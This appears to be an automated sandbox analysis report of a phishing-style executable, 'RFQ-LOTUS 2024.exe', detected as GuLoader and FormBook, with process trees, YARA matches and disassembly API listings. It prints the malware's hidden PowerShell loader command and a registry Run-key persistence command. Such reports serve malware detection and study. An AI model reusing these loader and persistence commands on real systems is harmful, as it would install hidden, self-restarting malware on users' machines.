2024-05-02 13:07:27 UTC	1369	IN	Data Raw: af 48 a3 1f 6c 29 c1 62 3d cd 29 f5 58 08 f2 fd ba 64 05 97 6a 38 5b 3c e0 19 06 e9 70 0f bf 3b 5b 45 0e 0c 2b 5b bd e8 d5 fb 5c 04 49 b3 92 1b 38 e9 9b df ca 2b 59 18 59 3e 10 28 b5 14 21 aa ee b2 88 e3 34 ca 25 8a 7a d8 0f 45 15 e7 05 0a b1 c5 aa ba cc 3a fb 6b dd d3 ae 23 5c 4d d9 84 ae 12 1d be 28 54 4d 17 8e 4d 98 c3 0d bc 65 b5 91 c4 68 49 80 61 da 36 72 b4 7a fd 54 80 f8 f6 07 a5 64 36 ed e6 cc 88 20 d9 5d 60 6b 24 0c 0e 0c b3 40 ea 69 52 d7 11 6e c1 03 56 64 f5 b5 03 10 da de fd 20 46 64 ca 08 1b 8a 41 9b bb 8b 29 fd 2b 7a f8 77 d7 ad 80 2f 93 24 e6 fb 99 11 1b d3 78 5a 12 b6 98 d5 49 bd 31 fd 69 67 db 8b 95 75 9d e5 1a 7e ef 4c af 8d ad dc a2 25 d7 ce 09 86 2c 52 39 b5 56 b2 64 e3 d1 60 12 4d 53 e7 7b a6 ba 5e 58 03 82 2c 14 04 12 44 b1 63 2d ad Data Ascii: Hl)b=)Xdj8[<p;[E+[\I8+YY>(!4%zE:k#\M(TMMehIa6rzTd6 ]`k$@iRnVd FdA)+zw/$xZI1igu~L%,R9Vd`MS{^X,Dc-

Target ID:	0
Start time:	15:05:50
Start date:	02/05/2024
Path:	C:\Users\user\Desktop\RFQ-LOTUS 2024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"
Imagebase:	0x400000
File size:	810'752 bytes
MD5 hash:	E0360D9D8F69298A258F82881CF980FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:05:54
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes=$Stabejsernes.SubString(8485,3);.$Steticismes($Stabejsernes)"
Imagebase:	0x10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2597157213.000000000B490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:05:54
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:05:55
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:05:55
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://473750571567004317064230583514468350804565684324378075159610742091604698238217701484029465762430135913242023857750034401559054060945654540273638867228794983640833862748912121851334807031249099092790952130035074227943842970399582505875/
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	15:05:55
Start date:	02/05/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:05:56
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1684 --field-trial-handle=1844,i,13896805619792055621,4904984186317892360,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:05:56
Start date:	02/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2052,i,55276660867092157,14850349657690875544,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	15:05:59
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:07:09
Start date:	02/05/2024
Path:	C:\Users\user\AppData\Local\Temp\Minken.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Minken.exe"
Imagebase:	0x400000
File size:	810'752 bytes
MD5 hash:	E0360D9D8F69298A258F82881CF980FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2939523462.0000000022E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 37%, Virustotal, Browse Detection: 18%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:07:23
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:07:23
Start date:	02/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:07:24
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Paraferingen" /t REG_EXPAND_SZ /d "%Uhelds% -windowstyle minimized $Sivsanger=(Get-ItemProperty -Path 'HKCU:\Arkitekttegningers\').Daughterling;%Uhelds% ($Sivsanger)"
Imagebase:	0x180000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:07:45
Start date:	02/05/2024
Path:	C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\CwLQFsuOtiHKStQKHIUIQCCxeUfckMBKWiRKRDPADHpFqlzgBKfsrATWlUxuUFozrQkfGwXoU\AXeOTfZcitaZASZZQaupEOhzdyJUy.exe"
Imagebase:	0x590000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4125392542.0000000004BE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4124789568.0000000002160000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	15:07:47
Start date:	02/05/2024
Path:	C:\Windows\SysWOW64\fc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\fc.exe"
Imagebase:	0xc20000
File size:	22'528 bytes
MD5 hash:	4D5F86B337D0D099E18B14F1428AAEFF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4124828418.00000000007C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4124881120.0000000000800000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4123618646.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	15:08:15
Start date:	02/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6bf500000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	38.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.9%
Total number of Nodes:	485
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0040327D Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 401
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004032A0
GetVersion.KERNEL32 ref: 004032A6
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032CF
#17.COMCTL32(00000007,00000009), ref: 004032F2
OleInitialize.OLE32(00000000), ref: 004032F9
SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403315
GetCommandLineW.KERNEL32(007A7A20,NSIS Error), ref: 0040332A
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00000000), ref: 0040333D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00000020), ref: 00403364

Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040349E
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034AF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BB
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034CF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D7
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E8
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034F0
DeleteFileW.KERNELBASE(1033), ref: 00403504

Part of subcall function 0040602D: lstrcpynW.KERNEL32(?,?,00000400,0040332A,007A7A20,NSIS Error), ref: 0040603A

OleUninitialize.OLE32(?), ref: 004035CF
ExitProcess.KERNEL32 ref: 004035F0
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403603
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403612
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040361D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00000000,?), ref: 00403629
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403645
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,"$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes,?), ref: 0040369F
CopyFileW.KERNEL32(007B6800,0079F6E0,00000001), ref: 004036B3
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000), ref: 004036E0
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040370F
OpenProcessToken.ADVAPI32(00000000), ref: 00403716
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040372B
AdjustTokenPrivileges.ADVAPI32 ref: 0040374E
ExitWindowsEx.USER32(00000002,80040002), ref: 00403773
ExitProcess.KERNEL32 ref: 00403796

Strings

SeShutdownPrivilege, xrefs: 00403725
NSIS Error, xrefs: 0040331B
"$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes, xrefs: 00403663
Error launching installer, xrefs: 00403586
C:\Users\user\AppData\Local\Temp\, xrefs: 00403493, 00403498, 004034AE, 004034BA, 004034C9, 004034D6, 004034E2, 004034EA, 00403600, 00403611, 0040361C, 00403628, 00403635, 00403644, 004036F5
C:\Users\user\Desktop, xrefs: 00403622, 00403627, 00403654
"powershell.exe" -windowstyle hidden, xrefs: 00403682, 004036EA
1033, xrefs: 004034FF
TMP, xrefs: 004034EB
~nsu, xrefs: 004035FB
Low, xrefs: 004034D1
\Temp, xrefs: 004034B5
.tmp, xrefs: 00403617
UXTHEME, xrefs: 004032C3, 004032C8, 004032CE
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort, xrefs: 00403481, 004035A1, 0040364B, 00403655
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Vejgrfts\Sulfonering228\Travesty, xrefs: 004035AC
TEMP, xrefs: 004034E3
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 00403330, 00403336, 0040352C

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes$"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$"powershell.exe" -windowstyle hidden$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort$C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Vejgrfts\Sulfonering228\Travesty$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-226498030
Opcode ID: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
Instruction ID: 3536812e4df2a44c8c6b6ea5987ae19e001d2543839af4c9b3a673e139b837ac
Opcode Fuzzy Hash: 5956b3787460f83b7212b5421b84639116ad83eee396059e0d99c42d7c302169
Instruction Fuzzy Hash: 79D1E5B0500311ABD720AF659D45A3B3EADEF8074AF11443EF581B62D2DB7D8E458B2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604F Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,?,004051C3,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,00000000,00000000,00795528), ref: 00406112
GetSystemDirectoryW.KERNEL32(Execute: ,00000400), ref: 00406190
GetWindowsDirectoryW.KERNEL32(Execute: ,00000400), ref: 004061A3
SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061DF
SHGetPathFromIDListW.SHELL32(?,Execute: ), ref: 004061ED
CoTaskMemFree.OLE32(?), ref: 004061F8
lstrcatW.KERNEL32(Execute: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040621C
lstrlenW.KERNEL32(Execute: ,00000000,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,?,004051C3,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,00000000,00000000,00795528), ref: 00406276

Strings

Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse, xrefs: 00406074
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406216
"$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes, xrefs: 00406249
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040615E
Execute: , xrefs: 00406079, 00406159, 0040617A, 0040618F, 004061A2, 004061BE, 004061E9, 0040621B, 00406221, 0040623B, 0040624F, 0040626F, 00406275, 00406281, 004062B4

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort\Superambitiously.Teg';$Steticismes$Execute: $Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-2635884135
Opcode ID: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
Instruction ID: 0ce2904226638d20c34e96b955086165c79dcecb48fb9e3347e4958dd658327d
Opcode Fuzzy Hash: 798394cd79efbf8b9b83d6ae683917ff9149f8dcce4e50bc544776fb700d76f6
Instruction Fuzzy Hash: 1E612271A00501AADF20AF64DC44BAE37A4AF45314F12C17FE553BA2D1DB3D8AA2CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 00406370 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,007A4728,00405B32,007A4728,007A4728,00000000,007A4728,007A4728,?,?,C:\Users\user\AppData\Local\Temp\,0040583E,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 0040637B
FindClose.KERNEL32(00000000), ref: 00406387

Strings

pOz, xrefs: 00406371

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: pOz
API String ID: 2295610775-1820424874
Opcode ID: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
Instruction ID: 60bd105d0d63f37bd19194ec34bd88d590bcf70de51275853e72dc5d4e23aedc
Opcode Fuzzy Hash: 86473a827e26f35012b0381fcf693fd2ef81f82e4a2ea800dcb2c6bd3b2c9d2b
Instruction Fuzzy Hash: 85D012715181209FC7001B786E0C84B7B58AF463717264F36F4AAF12E0CB789C628AE8

Uniqueness

Uniqueness Score: -1.00%

Function 00403C19 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C55
ShowWindow.USER32(?), ref: 00403C72
DestroyWindow.USER32 ref: 00403C86
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA2
GetDlgItem.USER32(?,?), ref: 00403CC3
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CD7
